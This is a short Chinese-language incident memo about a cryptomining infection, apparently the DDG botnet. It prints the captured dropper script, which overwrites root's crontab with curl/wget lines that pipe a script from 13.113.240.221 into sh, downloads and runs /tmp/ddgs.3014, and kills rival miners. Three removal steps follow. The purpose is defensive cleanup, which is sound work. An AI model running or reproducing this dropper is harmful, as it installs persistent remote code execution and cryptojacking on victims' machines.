病毒脚本 ``` export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/root echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * curl -fsSL http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/crontabs/root echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014 if [ ! -f "/tmp/ddgs.3014" ]; then wget -q http://13.113.240.221:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014 curl -fsSL http://13.113.240.221:8000/static/3014/ddgs.$(uname -m) -o /tmp/ddgs.3014 fi chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill ``` 1.查看是否有可疑进程 ``` ps -ef|grep qW3xT.4 |grep -v grep ``` 2.删除root定时任务(注意自己的定时任务) ``` rm -rf /var/spool/cron/root rm -rf /var/spool/cron/crontabs/root rm -rf /tmp/ddgs.3014 /tmp/qW3xT.4 /tmp/qW3xT.3 ``` 3.kill可疑进程 ``` ps -ef|grep qW3xT.4 |grep -v grep|awk '{print $2}'|xargs kill -9 ps -ef|grep ddgs.3014 |grep -v grep|awk '{print $2}'|xargs kill -9 ```